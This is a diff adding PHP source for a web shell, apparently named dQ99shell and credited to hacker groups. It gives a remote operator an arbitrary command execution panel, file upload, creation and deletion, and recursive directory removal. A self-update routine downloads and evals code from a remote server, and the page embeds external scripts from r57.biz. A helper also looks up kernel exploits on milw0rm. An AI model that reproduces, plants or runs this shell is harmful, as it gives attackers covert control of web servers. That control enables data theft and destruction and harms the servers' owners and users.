+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
+"aGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEdQXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>".
+       "Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
+       "Re-Coding, tricks, html and css by <b>diKi [FeeLCoMz CoMMuNiTy]</b><br><br>".
+       "Report bugs to <a href=\"mailto:thesabotaqe@gmail.com\">r57.biz</a></b>";
+}
+echo "</td></tr></table>\n";
+/*** COMMANDS PANEL ***/
+?>
+<div  class=bartitle><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
+    </form>
+</td></tr>
+<tr><td align=right>PHP Filesystem:</td>
+<td>
+<?php ##[ diKi TriCkz ]## ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+}
+function chg_arg(num,txt1,txt2) {
+  if (num==0) {
+    document.forms.fphpfsys.arg1.type = "hidden";
+    document.forms.fphpfsys.A1.type = "hidden";
+  }
+  if (num<=1) {
+    document.forms.fphpfsys.arg2.type = "hidden";
+    document.forms.fphpfsys.A2.type = "hidden";
+  }
+  if (num==2) {
+    document.forms.fphpfsys.A1.type = "label";
+    document.forms.fphpfsys.A2.type = "label";
+    document.forms.fphpfsys.arg1.type = "text";
+    document.forms.fphpfsys.arg2.type = "text";
+  }
+  document.forms.fphpfsys.A1.value = txt1 + ":";
+  document.forms.fphpfsys.A2.value = txt2 + ":";
+}
+</script>
+<?php
+  echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
+       "<select name=\"phpfsysfunc\">\r\n";
+  foreach ($phpfsaliases as $als) {
+    if ($als[1]==$phpfsysfunc) {
+      echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+    else {
+      echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+  }
+  echo "</select>\r\n".
+       "<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
+       "<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
+       "<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
+  foreach ($sh_sourcez as $e => $o) {
+    echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
+  }
+  echo "</form>\r\n";
+?>
+</td></tr>
+<tr><td align=right>Search File:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
+    </form><SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+    </td></tr>
+<tr><td align=right>Create File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
+    </form></td></tr>
+</table>
+<?php footer(); ?>
+</body></html>
+<?php
+
+###########################
+## dQ99Sh CORE FUNCTIONS ##
+###########################
+function safemode() {
+  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
+  else { return FALSE; }
+}
+function getdisfunc() {
+  $disfunc = @ini_get("disable_functions");
+  if (!empty($disfunc)) {
+    $disfunc = str_replace(" ","",$disfunc);
+    $disfunc = explode(",",$disfunc);
+  }
+  else { $disfunc= array(); }
+  return $disfunc;
+}
+function enabled($func) {
+ if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
+ else { return FALSE; }
+}
+function dQ99exec($cmd) {
+  $output = "";
+  if ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  return $output;
+}
+function dQ99exec2($cmd) {
+  $output = "";
+  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  return $output;
+}
+function which($pr) {
+  $path = dQ99exec("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+
+function get_status() {
+  function showstat($sup,$stat) {
+    if ($stat=="on") { return "$sup: <font color=#00FF00><b>ON</b></font>"; }
+    else { return "$sup: <font color=#FF9900><b>OFF</b></font>"; }
+  }
+  $arrfunc = array(
+    array("MySQL","mysql_connect"),
+    array("MSSQL","mssql_connect"),
+    array("Oracle","ocilogon"),
+    array("PostgreSQL","pg_connect"),
+    array("Curl","curl_version"),
+  );
+  $arrcmd = array(
+    array("Fetch","fetch --help"),
+    array("Wget","wget --help"),
+    array("Perl","perl -v"),
+  );
+
+  $statinfo = array();
+  foreach ($arrfunc as $func) {
+    if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
+    else { $statinfo[] = showstat($func[0],"off"); }
+  }
+  $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
+  foreach ($arrcmd as $cmd) {
+    if (dQ99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
+    else { $statinfo[] = showstat($cmd[0],"off"); }
+  }
+  return implode(" ",$statinfo);
+}
+function showdisfunc() {
+  if ($disablefunc = @ini_get("disable_functions")) {
+    return "<font color=#FF9900><b>".$disablefunc."</b></font>";
+  }
+  else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) { $bool = is_dir($letter.":\\"); }
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+                  ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
+      if ($letter.":" != $v) { $letters .= $letter; }
+      else { $letters .= "<font color=yellow>".$letter."</font>"; }
+      $letters .= "</a> ";
+    }
+  }
+  if (!empty($letters)) { Return $letters; }
+  else  {Return "None"; }
+}
+function disp_freespace($curdrv) {
+  $free = @disk_free_space($curdrv);
+  $total = @disk_total_space($curdrv);
+  if ($free === FALSE) { $free = 0; }
+  if ($total === FALSE) { $total = 0; }
+  if ($free < 0) { $free = 0; }
+  if ($total < 0) { $total = 0; }
+  $used = $total-$free;
+  $free_percent = round(100/($total/$free),2)."%";
+  $free = view_size($free);
+  $total = view_size($total);
+  return "$free of $total ($free_percent)";
+}
+## dQ99Sh UPDATE FUNCTIONS ##
+function dQ99getsource($fn) {
+  global $dQ99sh_sourcesurl;
+  $array = array(
+    "dQ99sh.php" => "dQ99sh.txt",
+  );
+  $name = $array[$fn];
+  if ($name) {return file_get_contents($dQ99sh_sourcesurl.$name);}
+  else {return FALSE;}
+}
+function dQ99sh_getupdate($update = TRUE) {
+  $url = $GLOBALS["dQ99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+  $data = @file_get_contents($url);
+  if (!$data) { return "Can't connect to update-server!"; }
+  else {
+    $data = ltrim($data);
+    $string = substr($data,3,ord($data{2}));
+    if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+    if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+    if ($data{0} == "\x99" and $data{1} == "\x03") {
+      $string = explode("|",$string);
+      if ($update) {
+        $confvars = array();
+        $sourceurl = $string[0];
+        $source = file_get_contents($sourceurl);
+        if (!$source) {return "Can't fetch update!";}
+        else {
+          $fp = fopen(__FILE__,"w");
+          if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download dQ99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+          else {
+            fwrite($fp,$source);
+            fclose($fp);
+            return "Update completed!";
+          }
+        }
+      }
+      else {return "New version are available: ".$string[1];}
+    }
+    elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+      eval($string);
+      return 1;
+    }
+    else {return "Error in protocol: segmentation failed! (".$data.") ";}
+  }
+}
+function dQ99_buff_prepare() {
+  global $sess_data;
+  global $act;
+  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  $sess_data["copy"] = array_unique($sess_data["copy"]);
+  $sess_data["cut"] = array_unique($sess_data["cut"]);
+  sort($sess_data["copy"]);
+  sort($sess_data["cut"]);
+  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+function dQ99_sess_put($data) {
+  global $sess_cookie;
+  global $sess_data;
+  dQ99_buff_prepare();
+  $sess_data = $data;
+  $data = serialize($data);
+  setcookie($sess_cookie,$data);
+}
+## END dQ99Sh UPDATE FUNCTIONS ##
+## FILESYSTEM FUNCTIONS ##
+function fs_copy_dir($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      if (!$ret) {return $ret;}
+    }
+  }
+  closedir($h);
+  return TRUE;
+}
+function fs_copy_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_copy_dir($d,$t);
+  }
+  elseif (is_file($d)) { return copy($d,$t); }
+  else { return FALSE; }
+}
+function fs_move_dir($d,$t) {
+
+  $h = opendir($d);
+  if (!is_dir($t)) {mkdir($t);}
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      $ret = TRUE;
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+      if (!$ret) {return $ret;}
+     }
+   }
+  closedir($h);
+  return TRUE;
+}
+function fs_move_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_move_dir($d,$t);
+  }
+  elseif (is_file($d)) {
+    if(copy($d,$t)) {return unlink($d);}
+    else {unlink($t); return FALSE;}
+  }
+  else {return FALSE;}
+}
+function fs_rmdir($d) {
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.$o)) {unlink($d.$o);}
+      else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+    }
+  }
+  closedir($h);
+  rmdir($d);
+  return !is_dir($d);
+}
+function fs_rmobj($o) {
+  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+  if (is_dir($o)) {
+    if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+    return fs_rmdir($o);
+  }
+  elseif (is_file($o)) {return unlink($o);}
+  else {return FALSE;}
+}
+## END FILESYSTEM FUNCTIONS ##
+function onphpshutdown() {
+  global $gzipencode,$ft;
+  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+    $v = @ob_get_contents();
+    @ob_end_clean();
+    @ob_start("ob_gzHandler");
+    echo $v;
+    @ob_end_flush();
+  }
+}
+function dQ99shexit() { onphpshutdown(); exit; }
+
+function dQ99fsearch($d) {
+  global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($f = readdir($h)) !== FALSE) {
+    if($f != "." && $f != "..") {
+      $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+      if (is_dir($d.$f)) {
+        $search_i_d++;
+        if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+        if (!is_link($d.$f)) {dQ99fsearch($d.$f);}
+      }
+      else {
+        $search_i_f++;
+        if ($bool) {
+          if (!empty($a["text"])) {
+            $r = @file_get_contents($d.$f);
+            if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+            if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+            if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+            else {$bool = strpos(" ".$r,$a["text"],1);}
+            if ($a["text_not"]) {$bool = !$bool;}
+            if ($bool) {$found[] = $d.$f; $found_f++;}
+          }
+          else {$found[] = $d.$f; $found_f++;}
+        }
+      }
+    }
+  }
+  closedir($h);
+}
+function view_size($size) {
+  if (!is_numeric($size)) { return FALSE; }
+  else {
+    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+    else {$size = $size . " B";}
+    return $size;
+  }
+}
+function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
+function view_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$type = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+  else {$type = "?";}
+  $owner["read"] = ($mode & 00400)?"r":"-";
+  $owner["write"] = ($mode & 00200)?"w":"-";
+  $owner["execute"] = ($mode & 00100)?"x":"-";
+  $group["read"] = ($mode & 00040)?"r":"-";
+  $group["write"] = ($mode & 00020)?"w":"-";
+  $group["execute"] = ($mode & 00010)?"x":"-";
+  $world["read"] = ($mode & 00004)?"r":"-";
+  $world["write"] = ($mode & 00002)? "w":"-";
+  $world["execute"] = ($mode & 00001)?"x":"-";
+  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+  return $type.join("",$owner).join("",$group).join("",$world);
+}
+function parse_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$t = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+  else {$t = "?";}
+  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+function parsesort($sort) {
+  $one = intval($sort);
+  $second = substr($sort,-1);
+  if ($second != "d") {$second = "a";}
+  return array($one,$second);
+}
+function view_perms_color($o) {
+  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+function str2mini($content,$len) {
+  if (strlen($content) > $len) {
+    $len = ceil($len/2) - 2;
+    return substr($content, 0,$len)."...".substr($content,-$len);
+  } else {return $content;}
+}
+function strips(&$arr,$k="") {
+  if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
+  else { $arr = stripslashes($arr); }
+}
+
+function getmicrotime() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+}
+
+function milw0rm() {
+  $Lversion = php_uname(r);
+  $OSV = php_uname(s);
+  if(eregi("Linux",$OSV)) {
+    $Lversion = substr($Lversion,0,6);
+    return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+  } else {
+    $Lversion = substr($Lversion,0,3);
+    return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+  }
+}
+function tools() {
+  echo "List of tools";
+}
+
+function sh_name() { return base64_decode("ZGlLaSBkUTk5c2hlbGwgdg==").sh_ver; }
+function htmlhead($safemode) {
+$style = '
+<style type="text/css">
+body,table {font:8pt verdana;background-color:black;}
+table {width:100%;}
+table,td,#maininfo td {padding:3px;}
+table,td,input,select,option {border:1px solid #808080;}
+body,table,input,select,option {color:#FFFFFF;}
+a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
+textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2;}
+#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
+#pagebar td {vertical-align:top;}
+#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
+#pagebar a {font-weight:bold;color:#00FF00;}
+#pagebar a:visited {color:#00CE00;}
+#mainmenu {text-align:center;}
+#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
+#maininfo,.barheader,.bartitle {text-align:center;}
+.fleft {float:left;text-align:left;}
+.fright {float:right;text-align:right;}
+.bartitle {padding:5px;border:2px solid #1F1F1F;}
+.barheader {font-weight:bold;padding:5px;}
+.info,.info td,.info th {margin:0;padding:0;border-collapse:collapse;}
+.info th {color:#00FF00;text-align:left;width:13%;}
+.contents,.explorer {border-collapse:collapse;}
+.contents,.explorer td,th {vertical-align:top;}
+.mainpanel {border-collapse:collapse;padding:5px;}
+.barheader,.mainpanel table,td {border:1px solid #333333;}
+input[type="submit"],input[type="button"] {border:1px solid #000000;}
+input[type="text"] {padding:3px;}
